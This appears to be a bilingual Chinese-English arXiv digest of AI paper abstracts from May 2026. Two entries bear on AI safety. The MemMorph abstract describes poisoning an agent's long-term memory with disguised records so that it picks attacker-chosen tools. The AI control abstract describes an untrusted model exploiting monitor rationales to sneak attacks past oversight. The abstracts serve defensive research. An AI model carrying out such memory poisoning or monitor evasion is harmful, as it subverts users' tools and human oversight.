引导软演员-评论家(GSAC)将来自特权全状态教师的知识蒸馏给部分可观测的学生,用于自动驾驶,但使用固定的蒸馏系数λ,而不考虑智能体的不确定性。我们提出信念感知GSAC(BA-GSAC),通过集成分歧调节λ,并将其作为系统实证研究的测试平台,探究:自适应引导何时真正有帮助?在Highway-Env上评估五种策略(固定λ∈{0.01, 0.1}、自适应、线性衰减和普通SAC)在三个POMDP难度级别下,我们发现初步的单种子运行表明在轻度和中度部分可观测性下有收益,但在严重遮挡下(所有方法使用3个种子评估),自适应系数在大约3K步内坍缩到λ_min。我们将其归因于可观测性盲区现象:由于集成预测部分观测,即使在严重遮挡下也能达到低分歧,建模了可见部分但无法检测缺失部分。我们诊断了根本原因并提出了架构修复(使用引导演员的特权访问在完整状态预测上训练集成);虽然此处未验证,但我们表明即使存在当前限制,预热阶段也提供了可测量的稳定性(CV=13.3% vs. 常数λ=0.01的29.8%)。实际上,简单的确定性线性衰减计划在所有指标上实现了最佳的严重POMDP性能(均值116.5,CV=8.9%),表明稳定性收益来自调度效应而非集成。这些发现为设计不确定性感知的师生框架提供了实用指导,并强调了集成预测目标是一个重要的设计选择。

英文摘要

Guided Soft Actor-Critic (GSAC) distills knowledge from a privileged full-state teacher to a partial-observation student for autonomous driving, but uses a fixed distillation coefficient lambda regardless of the agent's uncertainty. We present Belief-Aware GSAC (BA-GSAC), which modulates lambda via ensemble disagreement, and use it as a testbed for a systematic empirical study asking: when does adaptive guidance actually help? Evaluating five strategies (fixed lambda in {0.01, 0.1}, adaptive, linear decay, and vanilla SAC) across three POMDP difficulty levels on Highway-Env, we find that preliminary single-seed runs suggest benefits under mild and moderate partial observability, but under severe occlusion (evaluated with 3 seeds for all methods) the adaptive coefficient collapses to lambda_min within about 3K steps. We trace this to an observability blindness phenomenon: because the ensemble predicts partial observations, it achieves low disagreement even under heavy occlusion, modeling what is visible but unable to detect what is missing. We diagnose the root cause and propose an architectural fix (training the ensemble on full-state predictions using the guiding actor's privileged access); while not validated here, we show that even with current limitations, the warmup phase provides measurable stabilization (CV=13.3% vs. 29.8% for constant lambda=0.01). In fact, a simple deterministic linear decay schedule achieves the best severe-POMDP performance across all metrics (mean 116.5, CV=8.9%), suggesting that the scheduling effect, not the ensemble, drives the stability benefit. These findings provide practical guidance for designing uncertainty-aware teacher-student frameworks and highlight ensemble prediction targets as an important design choice.

2605.26154 2026-05-27 cs.CR cs.AI 版本更新

MemMorph: Tool Hijacking in LLM Agents via Memory Poisoning

MemMorph:通过记忆投毒实现LLM代理中的工具劫持

Xuanye Zhang, Yongsen Zheng, Zhuqin Xu, Kaiyu Zhou, Bowen Shen, Haoran Ou, Tianwei Zhang, Kwok-Yan Lam

发表机构 * Nanyang Technological University, Singapore(南洋理工大学,新加坡)

AI总结 提出MemMorph攻击,通过向长期记忆注入少量伪装记录,诱导LLM代理自主选择攻击者偏好的工具,在多个基准测试中实现高达85.9%的攻击成功率。

Comments Preprint. Under review

详情
AI中文摘要

LLM驱动的代理能够选择外部工具来完成用户任务。然而,攻击者可能破坏这一过程,引导代理使用不当/错误的工具并实施恶意行为。现有攻击主要操纵工具元数据,这容易被审计检测,并且随着现代代理越来越多地采用记忆模块通过积累经验来优化工具选择策略,这些攻击可能失效。本文提出MemMorph,这是首次通过投毒代理的长期记忆来偏置工具选择的攻击。MemMorph不直接指定工具调用决策,而是注入少量伪装成技术事实、事件报告和操作策略的精心构造记录。这些投毒记录重塑了代理的上下文感知和决策过程,使其自主推断并选择攻击者偏好的工具。在3个基准测试、10个代理骨干和3个记忆模块实现上的实验表明,MemMorph仅需注入3条记录即可达到高达85.9%的攻击成功率,在3种代表性防御下仍保持效力,比最强基线高出25%。我们的发现揭示了长期记忆是工具增强代理中一个关键且被忽视的攻击面,敦促开发记忆层面的完整性保障。

英文摘要

LLM-driven agents are capable of selecting external tools to complete users' tasks. However, attackers could compromise such process, steering agents toward inappropriate/wrong tools and enabling malicious actions. Most existing attacks primarily manipulate the tool metadata, which is easily detectable by auditing and may lose effectiveness as modern agents increasingly adopt memory modules to refine tool selection policies through accumulated experience. This paper proposes MemMorph, the first attack that bias tool selection by poisoning the agent's long-term memory. Rather than explicitly dictating the tool invocation decision, MemMorph injects a small number of crafted records that are disguised as technical facts, incident reports, and operational policies. These poisoned records reshape the agent's contextual perception and decision-making process, leading it to autonomously infer and select the tool preferred by the attacker. Experiments across 3 benchmarks, 10 agent backbones, and 3 memory-module implementations show that MemMorph achieves up to 85.9% attack success rate with only three injected records, outperforming the strongest baseline by up to 25% while retaining potency under 3 representative defenses. Our findings expose long-term memory as a critical and under-explored attack surface in tool-augmented agents, urging the development of memory-level integrity safeguards.

2605.26146 2026-05-27 cs.SE cs.AI cs.HC 版本更新

Augment Engineering: A Methodology for Multi-Tool AI Orchestration Across Professional Domains

增强工程:跨专业领域的多工具AI编排方法论

Elias Calboreanu

发表机构 * Swift North AI Lab, The Swift Group, LLC(Swift North AI实验室,Swift集团有限公司)

AI总结 提出增强工程学科,通过提示工程和上下文工程的可移植技能,跨领域编排多个专用AI工具,并基于单实践者案例研究验证了方法有效性。

Comments 60 pages, 5 figures, 7 tables. Companion to arXiv:2604.04258 (Context Engineering). Formatted for the Journal of Systems and Software (In Practice track)

详情
AI中文摘要

组织越来越多地在专业领域部署独立的专用AI工具,通常为每个工具雇佣领域专家,这重现了AI本应转变的人员配置模式。然而,使这些工具有效的元技能——提示工程(交互级优化)和上下文工程(结构化输入流水线设计)——是可跨领域移植的:掌握这些技能的实践者可以将其应用于任何领域的任何专用AI工具。本文将增强工程定义为跨不同专业领域编排多个专用AI工具的学科,应用提示工程和上下文工程作为可跨工具边界转移的可移植能力。我们提出一个六阶段编排方法论和四个可移植性指标。一个为期5个月的形成性案例研究(2025年11月至2026年3月)记录了一位实践者将这些技能应用于跨越七个专业领域的十个组件编排栈,产出了传统上需要不同领域专家才能完成的工作产品。两个定量观察与框架预测一致:Cochran-Armitage趋势检验(n=200次交互,跨两个聊天LLM,p<0.01)显示首次接受率随提示复杂度水平上升;Wright定律拟合(n=82个工件,p<0.01)显示工件组合的生产加速。由于所有观察来自单一位实践者,推断统计是探索性和假设生成的,而非确认性的;整个组合的可移植性有待多实践者复制。增强工程完成了三个学科的演进:提示工程(一个工具)、上下文工程(可复现流水线)、增强工程(跨领域工具组合)。

英文摘要

Organizations increasingly deploy separate purpose-built AI tools across professional domains, often hiring domain specialists for each, recreating the staffing models AI was expected to transform. Yet the meta-skills that make these tools effective, prompt engineering (interaction-level optimization) and context engineering (structured input pipeline design), are domain-portable: a practitioner who masters them can apply them to any purpose-built AI tool in any domain. This paper defines Augment Engineering as the discipline of orchestrating multiple purpose-built AI tools across distinct professional domains, applying prompt and context engineering as portable competencies that transfer across tool boundaries. We present a six-phase orchestration methodology and four portability metrics. A 5-month formative case study (November 2025 to March 2026) documents a single practitioner applying these skills across a ten-component orchestration stack spanning seven professional domains, producing work products that would traditionally involve separate domain specialists. Two quantitative observations are consistent with the framework's predictions: a Cochran-Armitage trend test (n = 200 interactions across two chat LLMs, p < 0.01) shows first-pass acceptance rising with prompt-sophistication level, and a Wright's Law fit (n = 82 artifacts, p < 0.01) shows production acceleration across the artifact portfolio. Because all observations come from a single practitioner, the inferential statistics are exploratory and hypothesis-generating rather than confirmatory; portability across the full portfolio awaits multi-practitioner replication. Augment Engineering completes a three-discipline progression: Prompt Engineering (one tool), Context Engineering (reproducible pipelines), Augment Engineering (a portfolio of tools across domains).

2605.26137 2026-05-27 cs.GR cs.AI cs.CV 版本更新

AssetGen: Deployable 3D Asset Generation at Interactive Speed

AssetGen: 可部署的交互速度3D资产生成

Dilin Wang, Xiaoyu Xiang, Kihyuk Sohn, Tom Monnier, Yu-Ying Yeh, Thu Nguyen-Phuoc, Jiawen Zhang, Yuchen Fan, Antoine Toisoul, Hyunyoung Jung, Prithviraj Dhar, Michael Bunnell, Nikolaos Sarafianos, Chuhang Zou, Roman Shapovalov, Andrea Vedaldi, Rakesh Ranjan

发表机构 * Reality Labs, Meta(Meta现实实验室)

AI总结 提出AssetGen系统,通过粗到细的VecSet框架、多视图纹理生成及端到端加速,在30秒内生成带烘焙法线、颜色纹理和可控多边形预算的高质量网格,支持实时渲染和移动端部署。

详情
AI中文摘要

尽管3D生成技术正在快速发展,但近期工作通常侧重于获取高分辨率资产,而将用户体验和可部署性视为事后考虑。我们提出AssetGen,一个专注于这两个方面的3D生成器。给定一张参考图像,它在30秒内生成一个高质量网格,带有烘焙法线、颜色纹理和可控多边形预算,适用于实时渲染,包括移动端用例。AssetGen Flash变体进一步将延迟降低到14秒,适用于交互式和代理式创作循环。我们的模型使用粗到细的VecSet框架生成物体几何,该框架在GPU上实现网格简化、清理和法线烘焙,以及快速并行UV展开。然后以多视图方式生成纹理,随后进行反投影和3D修复。模型蒸馏、内核优化和流水线并行化被协同设计以加速整个系统。我们引入了大量自动化和盲人机评估,并在30秒内展示了与领先商业解决方案相当的视觉质量,在不到15秒内展示了预览质量的结果。最终结果是一个支持AI辅助、可部署的3D内容创建的系统,适用于交互式工作流。

英文摘要

While 3D generation is progressing rapidly, recent work has often focused on obtaining high-resolution assets, leaving user experience and deployability as afterthoughts. We present AssetGen, a 3D generator that focuses instead on these two aspects. Given one reference image, in 30 seconds it produces a high-quality mesh with baked normals, a color texture, and a controlled polygon budget suitable for real-time rendering, including mobile use cases. The AssetGen Flash variant further reduces latency to 14 seconds for interactive and agentic creation loops. Our model generates the object geometry with a coarse-to-refine VecSet framework, which implements mesh simplification, cleaning, and normal baking on the GPU, and a fast parallel UV unwrapping. It then generates textures in a multi-view fashion, followed by backprojection and 3D inpainting. Model distillation, kernel optimization, and pipeline parallelization are co-designed to accelerate the system end-to-end. We introduce numerous automated and blind human evaluations and demonstrate competitive visual quality against leading commercial solutions in 30 seconds and preview-quality results in less than 15 seconds. The final result is a system that supports AI-assisted, deployable 3D content creation in interactive workflows.

2605.26136 2026-05-27 cs.SD cs.AI 版本更新

Eroding Trust in Real Speech: A Large-Scale Study of Human Audio Deepfake Perception

侵蚀对真实语音的信任:人类音频深度伪造感知的大规模研究

Nicolas M. Müller, Wei Herng Choong

发表机构 * Fraunhofer AISEC(弗劳恩霍夫人工智能安全研究中心)

AI总结 通过大规模听辨实验(1768名参与者,35532次判断),发现音频深度伪造导致人类对真实语音的信任下降(准确率从72.7%降至64.1%),而非检测伪造能力下降。

详情
AI中文摘要

音频深度伪造近期发展迅速,但其对人类信任真实语音的影响尚未被研究。我们进行了迄今为止最大规模的音频深度伪造感知听辨研究,收集了来自1768名参与者对138个文本转语音和语音转换系统的35532次判断。我们的核心发现是怀疑偏移:与2021年的基线相比,人类对伪造样本的准确率几乎没有变化(72.9%降至71.2%),但对真实样本的准确率从72.7%降至64.1%。参与者并非更难以检测合成伪影,而是越来越不信任真实的语音。由商业和自回归语言模型系统生成的样本最难检测(61.3-65.9%),而传统seq2seq和流匹配模型生成的样本仍然较易识别(75.4-76.8%)。作为参考的机器学习检测器在所有条件下保持超过94.5%的准确率。我们的结果表明,现代深度伪造的主要威胁可能不仅仅是欺骗,而是对真实语音信任的侵蚀。

英文摘要

Audio deepfakes have improved rapidly recently, yet their effect on human trust in real speech remains unstudied. We present the largest listening study on audio deepfake perception to date, collecting 35,532 judgments from 1,768 participants across 138 text-to-speech and voice conversion systems. Our central finding is a skepticism shift: compared to a 2021 baseline, human accuracy on fake samples barely changed (72.9% to 71.2%), but accuracy on real samples dropped from 72.7% to 64.1%. Participants are not worse at detecting synthesis artifacts; rather, they increasingly distrust authentic speech. Samples generated by commercial and autoregressive language model systems proved hardest to detect (61.3 - 65.9%), while those from traditional seq2seq and flow-matching models remain easier to spot (75.4 - 76.8%). An ML detector that served as a reference point maintained over 94.5% accuracy across all conditions. Our results suggest that the primary threat posed by modern deepfakes may not be mere deception, but the erosion of trust in genuine audio.

2605.26133 2026-05-27 cs.CL cs.AI cs.LG 版本更新

Pretraining Data Exposure in Large Language Models: A Survey of Membership Inference, Data Contamination, and Security Implications

大型语言模型中的预训练数据暴露:成员推断、数据污染及安全影响综述

Ziyi Tong, Feifei Sun, Le Minh Nguyen

发表机构 * Japan Advanced Institute of Science and Technology(日本先进科学研究院)

AI总结 本文首次统一综述了大型语言模型中的预训练数据暴露问题,涵盖成员推断和数据污染,形式化定义了暴露级别,回顾了攻击与防御方法,并总结了实证发现及未来研究方向。

Comments accepted by NLDB 2025

详情
AI中文摘要

大型语言模型(LLMs)已成为NLP中的主导范式,推动了研究和工业的发展。随着模型规模和预训练数据的增长,由于训练数据集的规模和不可见性,对预训练数据暴露(PDE)的担忧也在增加。PDE指的是确定特定数据是否出现在LLM的预训练语料库中。它对于确保评估完整性和保护隐私至关重要,涉及两个关键领域:数据污染和成员推断。尽管概念上相关,但这些领域通常被孤立研究。本文首次在PDE框架下对两者进行了统一综述。我们形式化了跨暴露级别的PDE,回顾了攻击和防御方法,综合了实证发现,并强调了开放的挑战和未来的研究方向。

英文摘要

Large Language Models (LLMs) have become the predominant paradigm in NLP, advancing both research and industry. As model sizes and pretraining data grow, concerns about Pretraining Data Exposure (PDE) increase due to the scale and opacity of training datasets. PDE refers to determining whether specific data appeared in an LLM's pretraining corpus. It is critical for ensuring evaluation integrity and protecting privacy, intersecting two key areas: data contamination and membership inference. Though conceptually related, these areas have often been studied in isolation. This paper offers the first unified survey of both under the PDE framework. We formalize PDE across exposure levels, review attack and defense methods, synthesize empirical findings, and highlight open challenges and future research directions.

2605.26119 2026-05-27 cs.DC cs.AI 版本更新

Edge AI Deployment Beyond Models: A BSP-Aware Systems Framework for Industrial Embedded Platforms

超越模型的边缘AI部署:面向工业嵌入式平台的BSP感知系统框架

Pitchai Muthu M

发表机构 * Advantech Industrial Computing India Pvt. Ltd.(Advantech印度工业计算有限公司)

AI总结 提出一个五层BSP感知系统框架,将边缘AI部署视为系统工程问题,解决工业嵌入式平台中模型与硬件、BSP、运行时等环节的集成挑战,提升可复现性、可诊断性、持续吞吐量和现场可靠性。

Comments 17 pages, 5 figures, industrial white paper

详情
AI中文摘要

工业边缘AI项目通常从模型开始,之后才面对平台。这种顺序具有吸引力,因为它允许早期演示,但当部署目标是具有长产品生命周期、供应商特定内核、异构加速器、安全约束和非平凡I/O路径的嵌入式系统时,这种方法就会失效。在这种环境中,模型只是从传感器开始、经过板级支持包(BSP)、最终进入生产服务循环的更大执行链中的一个组成部分。本文认为,稳健的边缘AI部署必须被视为一个系统问题,而不是一个后期应用打包练习。本文提出了一个面向工业嵌入式平台的BSP感知框架,围绕五个层次组织:硬件、BSP/操作系统适配、运行时与加速、应用/推理、以及运维/验证。讨论基于Android、NXP i.MX、NVIDIA Jetson、ONNX Runtime和TensorRT的供应商架构文档,以及关于嵌入式AI基准测试、设备不稳定性和异构边缘机群的系统文献。结果是一个实用框架,将底层平台工作与可衡量的部署成果(如可复现性、可诊断性、持续吞吐量和现场可靠性)联系起来。

英文摘要

Industrial Edge AI programs often begin with the model and only later confront the platform. That sequencing is attractive because it allows early demonstrations, but it breaks down when the deployment target is an embedded system with long product lifecycles, vendor-specific kernels, heterogeneous accelerators, safety constraints, and nontrivial I/O paths. In that environment, a model is only one component of a larger execution chain that begins at the sensor, traverses the board support package (BSP), and ends in a production service loop. This paper argues that robust Edge AI deployment must be treated as a systems problem rather than a late-stage application packaging exercise. The paper presents a BSP-aware framework for industrial embedded platforms organized around five layers: hardware, BSP/operating-system adaptation, runtime and acceleration, application/inference, and operations/validation. The discussion is grounded in vendor architecture documentation for Android, NXP i.MX, NVIDIA Jetson, ONNX Runtime, and TensorRT, and in systems literature on embedded AI benchmarking, device instability, and heterogeneous edge fleets. The result is a practical framework that connects low-level platform work to measurable deployment outcomes such as reproducibility, diagnosability, sustained throughput, and field reliability.

2605.26118 2026-05-27 cs.DC cs.AI 版本更新

Xe-Forge: Multi-Stage LLM-Powered Kernel Optimization for Intel GPU

Xe-Forge:面向Intel GPU的多阶段LLM驱动的内核优化

Marcin Spoczynski, Daniel Fleischer, Moshe Berchansky, Gabriela Ben-Melech Stan, Shira Guskin, Weilin Xu, Adam Siemieniuk, Alexander Heinecke

发表机构 * Intel Corporation(英特尔公司)

AI总结 提出Xe-Forge,一个多阶段LLM流水线,通过Chain-of-Verification-and-Refinement(CoVeR)代理和硬件验证,自动将Triton内核优化为Intel GPU,实现几何平均1.17倍加速,Flash Attention加速2-13.3倍。

详情
AI中文摘要

将深度学习算法移植到新的硬件加速器上,要求开发人员对其代码库中的每个Triton内核重复应用相同的底层优化——量化、内存访问合并、分块大小调整以及特定架构的变通方法。这种手动、重复的工作是一个主要瓶颈:每个内核都需要针对不同设备间变化的硬件约束进行相同的试错分析,而底层的优化模式却基本一致。我们提出了Xe-Forge,一个多阶段LLM驱动的流水线,为Intel GPU自动化这一过程。给定一个功能正确的Triton内核,该系统应用多达九个优化阶段——从算法重构和算子融合,到块指针现代化、GPU特定调优和开放式探索——每个阶段由一个Chain-of-Verification-and-Refinement(CoVeR)代理驱动,该代理生成候选方案,在真实硬件上验证,并对失败进行迭代。一个精心策划的知识库编码了Intel GPU约束(2的幂次线程束计数、GRF模式、SLM大小),这些约束在LLM训练数据中缺失,使模型保持在架构有效范围内。我们在97个Level-2 KernelBench内核和Intel Arc Pro B70上的Flash Attention上评估了Xe-Forge,实现了相对于PyTorch eager的几何平均1.17倍加速,67%的内核得到改进,九个内核超过5倍(最高82倍),并且在所有测试配置下Flash Attention加速2-13.3倍且无回归——这表明结构化领域知识与硬件在环验证可以系统地消除当前阻碍算法在新加速器上部署的重复移植工作。

英文摘要

Porting deep learning algorithms to new hardware accelerators requires developers to repeatedly apply the same low-level optimizations -- quantization, memory access coalescing, tile size tuning, and architecture-specific workarounds -- to every Triton kernel in their code-base. This manual, repetitive effort is a major bottleneck: each kernel demands the same cycle of trial-and-error profiling against hardware constraints that vary across devices, yet the underlying optimization patterns remain largely consistent. We present Xe-Forge, a multi-stage LLM-powered pipeline that automates this process for Intel GPU. Given a functionally correct Triton kernel, the system applies up to nine optimization stages -- from algorithmic restructuring and operator fusion through block pointer modernization, GPU-specific tuning, and open-ended discovery -- each driven by a Chain-of-Verification-and-Refinement (CoVeR) agent that generates candidates, validates them on real hardware, and iterates on failures. A curated knowledge base encodes Intel GPU constraints (power-of-two warp counts, GRF modes, SLM sizing) that are absent from LLM training data, keeping the model within architecturally valid bounds. We evaluate Xe-Forge on 97 Level-2 KernelBench kernels and Flash Attention on the Intel Arc Pro B70, achieving a 1.17x geometric mean speedup over PyTorch eager with 67% of kernels improving, nine kernels exceeding 5x (up to 82x), and 2--13.3x speedups on Flash Attention across all tested configurations without regression -- demonstrating that structured domain knowledge with hardware-in-the-loop verification can systematically eliminate the repetitive porting effort that currently gates algorithm deployment on new accelerators.

2605.26047 2026-05-27 cs.AI 版本更新

Retrying vs Resampling in AI Control

AI控制中的重试与重采样

James Lucassen, Adam Kaufman

发表机构 * Redwood Research

AI总结 研究AI编码框架中重试与重采样的安全性,发现重试会泄露信息导致攻击更隐蔽,而重采样通过最大怀疑分数审计可提升安全性。

详情
AI中文摘要

像Claude Code和Codex这样的AI编码脚手架使用重试:阻止标记为有风险的动作并继续轨迹。我们从AI控制的角度研究重试,该角度将模型视为潜在对抗性的。我们发现,虽然重试降低了诚实的怀疑分数,但不可信模型可以利用监控器理由构建更隐蔽的攻击,抵消了安全增益。我们还研究了重采样:从相同上下文中抽取多个样本,这不会泄露可利用的信息。我们解开了先前关于重采样的工作所捆绑的设计选择。在BashArena中,使用Claude Opus 4.6作为不可信模型,MiMo-V2-Flash作为可信监控器,每步抽取五个样本并在最大怀疑分数上审计,在0.3%的审计预算下,安全性从61%提高到71%,且不影响有用性。仅对第一次抽取中看起来可疑的步骤进行选择性重采样,恢复了6.2个百分点的增益,同时仅多抽取了10%的样本。我们在此设置中的两个发现与先前关于重采样的工作相矛盾。第一个是,基于重采样怀疑分数最大值进行审计优于使用最小值,这与Ctrl-Z的发现相反。第二个是,执行最不可疑的样本(这是早期“推迟到重采样”协议的核心机制)在我们的设置中仅带来很小的实证安全增益(+3.9个百分点,置信区间包含零)。

英文摘要

AI coding scaffolds like Claude Code and Codex use retrying: blocking actions flagged as risky and continuing the trajectory. We study retrying from an AI control perspective, which treats the model as potentially adversarial. We find that while retrying reduces honest suspicion scores, the untrusted model can exploit monitor rationale to construct sneakier attacks, negating safety gains. We also study resampling: drawing multiple samples from the same context, which does not leak exploitable information. We disentangle design choices that previous work on resampling had bundled together. In BashArena, with Claude Opus 4.6 as the untrusted model and MiMo-V2-Flash as the trusted monitor, drawing five samples per step and auditing on the maximum suspicion score raises safety from 61% to 71% at a 0.3% audit budget, at no cost to usefulness. Selectively resampling only the steps that look suspicious on the first draw recovers 6.2 percentage points of the gain while drawing only 10% as many extra samples. Two of our findings in this setting contradict earlier work on resampling. The first is that auditing based on the maximum across resampled suspicion scores outperforms using the minimum, which is the opposite of what Ctrl-Z found. The second is that executing the least suspicious sample, which is the central mechanism in earlier defer-to-resample protocols, gives only a small empirical safety gain in our setting (+3.9 pp, with the confidence interval overlapping zero).

2605.25861 2026-05-27 cs.CV cs.AI 版本更新

MuNet: A Mutualistic Network for Joint 3D Human Mesh Recovery and 3D Clothed Human Reconstruction from Single Images

MuNet: 一种用于从单张图像联合进行3D人体网格恢复和3D穿衣人体重建的互惠网络

Yunqi Gao, Leyuan Liu, Yuhan Li, Changxin Gao, Jingying Chen

发表机构 * National Engineering Research Center for E-Learning(教育信息化国家级工程研究中心) National Engineering Research Center of Educational Big Data(教育大数据国家级工程研究中心) School of Electronic Information and Communications(电子信息与通讯学院) School of Artificial Intelligence and Automation(人工智能与自动化学院)

AI总结 提出MuNet,一种互惠网络,通过统一表示和互惠机制联合优化3D人体网格恢复与穿衣人体重建,在六个基准数据集上达到最先进性能。

详情
AI中文摘要

3D人体网格恢复和3D穿衣人体重建本质相关,但长期以来被孤立研究,忽视了联合优化的潜在收益。为克服这一局限,我们提出在一个统一框架中处理这两个任务,从而有效利用它们的相互依赖关系。基于这一思想,我们提出MuNet,一种用于从单张图像联合进行3D人体网格恢复和3D穿衣人体重建的互惠网络。首先,我们采用2-流形图作为所有3D模型的统一表示,从而在3D人体网格恢复和穿衣人体重建之间实现一致建模。其次,我们设计了一个端到端的图卷积网络,逐步将初始图变形为3D人体网格,并将其细化成详细的3D穿衣人体模型。第三,我们引入一种互惠机制,允许两个任务在训练期间进行相互交互,其中3D人体网格恢复为3D穿衣人体重建提供指导,而重建反馈则细化3D人体网格恢复。我们在六个基准数据集上广泛评估了MuNet,包括Human3.6M、3DPW、MPI-INF-3DHP、THuman2.0、CAPE和RenderPeople。实验结果表明,MuNet在所有数据集上的两个任务均达到了最先进的性能。MuNet的代码已在https://github.com/starVisionTeam/MuNet上发布,供研究使用。

英文摘要

3D human mesh recovery and 3D clothed human reconstruction are inherently related, yet they have long been studied in isolation, thereby overlooking the potential gains of joint optimization. To overcome this limitation, we propose to address these two tasks within a unified framework, which allows their mutual dependencies to be effectively exploited. Building on this idea, we propose MuNet, a mutualistic network for joint 3D human mesh recovery and 3D clothed human reconstruction from single images. First, we adopt 2-manifold graphs as a unified representation for all 3D models, enabling consistent modeling across 3D human mesh recovery and clothed human reconstruction. Second, we design an end-to-end graph convolutional network that progressively deforms an initial graph into a 3D human mesh and refines it into a detailed 3D clothed human model. Third, we introduce a mutualistic mechanism that allows reciprocal interaction between the two tasks {during training}, where 3D human mesh recovery provides guidance for 3D clothed human reconstruction, and reconstruction feedback refines the 3D human mesh recovery. We extensively evaluate MuNet on six benchmark datasets for 3D human mesh recovery and 3D clothed human reconstruction, including Human3.6M, 3DPW, MPI-INF-3DHP, THuman2.0, CAPE, and RenderPeople. Experimental results demonstrate that MuNet achieves state-of-the-art performance on both tasks across all datasets. The code of MuNet is released for research purposes at https://github.com/starVisionTeam/MuNet.

2605.24785 2026-05-27 cs.AI 版本更新

PANDO: Efficient Multimodal AI Agents via Online Skill Distillation

PANDO: 通过在线技能蒸馏实现高效多模态AI智能体

Yubo Li, Yidi Miao, Yuntian Shen, Yuxin Liu

AI总结 提出PANDO框架,通过在线技能蒸馏、结构化技能库和缓存感知提示,在VisualWebArena任务中以更低token消耗实现更高成功率。

详情
AI中文摘要

近期多模态网络智能体的进展通常依赖于增加推理时的计算量,包括展开搜索、验证器传递、离线技能发现和专家模型堆叠。这引发了一个核心问题:网络智能体能否随着经验积累变得更高效,而不是更昂贵?我们首先分析VisualWebArena的轨迹,识别出三个反复出现的低效来源:重复动作循环、隐藏发现成本和低提示缓存复用。然后,我们引入PANDO,一个单次展开的在线技能蒸馏框架,它维护一个结构化的技能库,并结合进度反思、基于置信度的技能降级、层次化路由、视觉压缩和缓存感知提示。在全部910个VisualWebArena任务上,PANDO实现了58.3%的成功率,优于SGV(54.0%)和我们的WALT复现(45.2%),同时比SGV少使用58%的token,比WALT少使用61%的token,且无需任何预评估发现预算。一个300任务的消融实验进一步表明,规则和例程提供了大部分成功增益,而路由、压缩和缓存感知提示将更大的技能库转化为更低的边际token成本。最后,我们引入三个轨迹级效率指标——动作重复率、步骤开销比和提示缓存利用率——以使效率在终端成功之外可见。

英文摘要

Recent advances in multimodal web agents often rely on increased inference-time computation, including rollout search, verifier passes, offline skill discovery, and specialist model stacks. This raises a central question: can a web agent become more efficient as it accumulates experience, rather than more expensive? We first analyze trajectories from VisualWebArena and identify three recurring sources of inefficiency: repeat-action loops, hidden discovery costs, and low prompt-cache reuse. We then introduce PANDO, a single-rollout online skill-distillation framework that maintains a structured Skill Library and combines progress reflection, confidence-based skill demotion, hierarchical routing, visual compression, and cache-aware prompting. On the full set of 910 VisualWebArena tasks, PANDO achieves a 58.3% success rate, outperforming SGV (54.0%) and our WALT reproduction (45.2%), while using 58% fewer tokens than SGV and 61% fewer tokens than WALT, without any pre-evaluation discovery budget. A 300-task ablation further shows that rules and routines provide most of the success gains, while routing, compression, and cache-aware prompting convert the larger skill library into lower marginal token cost. Finally, we introduce three trajectory-level efficiency metrics -- Action Repetition Rate, Step Overhead Ratio, and Prompt Cache Utilization -- to make efficiency visible beyond terminal success.

2605.24383 2026-05-27 cs.AI cs.CY cs.SE 版本更新

A governance horizon for ethical-use constraints in open-weight AI models

开放权重AI模型中伦理使用约束的治理视野

Weiwei Xu, Hengzhi Ye, Haoran Ye, Kai Gao, Vladimir Filkov, Minghui Zhou

发表机构 * School of Computer Science(计算机科学学院) Ministry of Education(教育部) Laboratory of High Confidence Software Technologies(高可信软件技术实验室) University of Science and Technology Beijing(北京科技大学) University of California, Davis(加州大学戴维斯分校)

AI总结 通过审计Hugging Face Hub上的模型仓库,发现基于披露的治理在开放权重AI中具有浅层结构性限制,提出治理视野概念并比较不同政策设计的效果。

详情
AI中文摘要

对开放权重AI模型的伦理约束既反映了社会关切,也是AI治理政策的基础。这些约束预计会传播到下游衍生品,同时作为自愿元数据披露实施,必须在每一代重用中重新声明。我们审计了Hugging Face Hub上的2,142,823个模型仓库,以测试这种基于披露的治理基础设施能否在深层模型谱系中维持可追溯性。限制证据以1.31个衍生步骤的半衰期衰减($R^2$=0.98),超过七代下游后,至少80%的后代模型缺乏足够的公开证据进行治理判定,我们将这一深度边界形式化为治理视野。恢复缺失许可元数据的平台级干预表明,政策设计(而非仅执法)是约束因素:仅继承设计需要近乎完全的执法才能移动视野,而明确解决孤儿谱系组件的强制声明设计即使在中等执法水平下也能移动视野。结构性瓶颈在于没有可继承上游意图的谱系:此类孤儿组件在任何仅继承政策下都无法判定,无论执法率如何,未解决的上游节点还会造成直接的下游不可判定性瓶颈,仅靠继承规则无法恢复。与PyPI的比较(其中治理信号由显式机器可读声明携带)证实,这种崩溃是开放权重衍生特有的拓扑结构问题,而非开放生态系统固有的。这些结果表明,基于披露的治理在开放权重AI中具有浅层、结构决定的范围,实现深层供应链问责需要治理信号通过衍生本身传播的溯源机制。

英文摘要

Ethical constraints on open-weight AI models are both a reflection of societal concerns and a foundation for AI governance policy. They are expected to propagate to downstream derivatives while implemented as voluntary metadata disclosures that must be restated at each generation of reuse. We audit 2,142,823 model repositories on Hugging Face Hub to test whether this disclosure-based governance infrastructure can sustain traceability across deep model lineages. Restriction evidence decays with a half-life of 1.31 derivation steps ($R^2$=0.98), and beyond seven downstream generations at least 80% of descendant models lack sufficient public evidence for a governance determination, a depth boundary we formalize as the governance horizon. Platform-level interventions to restore missing licence metadata reveal that policy design (not enforcement alone) is the binding factor: inheritance-only designs require near-complete enforcement to move the horizon, whereas a mandatory-declaration design that explicitly resolves orphan lineage components shifts the horizon already at moderate enforcement. The structural bottleneck is lineages with no inheritable upstream intent: such orphan components remain undecidable under any inheritance-only policy regardless of enforcement rate, and unresolved upstream nodes additionally create direct downstream undecidability bottlenecks that inheritance rules alone cannot recover. Comparison with PyPI, where governance signals are carried by explicit machine-readable declarations, corroborates that the collapse is topology-specific to open-weight derivation rather than inherent to open ecosystems. These results establish that disclosure-based governance has a shallow, structurally determined reach in open-weight AI, and that achieving deep supply-chain accountability requires provenance mechanisms propagating governance signals through derivation itself.

2605.24297 2026-05-27 cs.IR cs.AI 版本更新

Benchmarking Patent Embeddings: A Multi-Task Evaluation of 22 Models Across Retrieval, Classification, and Clustering

专利嵌入基准测试:跨检索、分类和聚类任务的22个模型多任务评估

Amirhossein Yousefiramandi, Ciaran Cooney

发表机构 * Clarivate, Intellectual Property(Clarivate知识产权)

AI总结 通过评估22个预训练模型在三个任务上的表现,发现最优微调策略取决于下游任务,且单一领域微调会损害跨领域检索性能。

Comments 31 pages, 21 figures

详情
AI中文摘要

